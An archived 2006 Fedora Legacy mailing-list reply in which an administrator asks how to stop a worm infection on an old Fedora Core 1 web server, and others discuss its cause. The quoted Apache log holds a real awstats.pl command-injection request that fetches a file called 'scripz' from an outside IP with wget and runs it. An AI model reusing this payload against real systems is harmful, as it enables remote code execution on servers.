Re: slapper worm

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Hi Mike,

> >  403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip
> >z%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1"
> >  404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)"
> >
> > These "scripz" files end up going into /tmp, being compiled with
> > gcc, renamed to "httpd" and run as that.
> >
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the packages to
> > fix/block slapper from an FC1 machine?
> >
> > Michael.
> >
>  
> 
> Are you sure it's using an SSL exploit?
> 
> http://www.lurhq.com/slapperv2.html
> 
> Regards, Mike Klinke

No I'm not sure. Reading through the link above, it does seem that you've hit
the nail on the head with this one. I have two other FC1 machines and they
weren't affected by Slapper (even when the 3rd one was). The FC1 machine that
was, had the xmlrpc.php file which I've now removed.

Michael.

--

fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list

[Index of Archives]     [Fedora Development]     [Fedora Announce]     [Fedora Legacy Announce]     [Fedora Config]     [PAM]     [Fedora General Discussion]     [Big List of Linux Books]     [Gimp]     [Yosemite Questions]

  Powered by Linux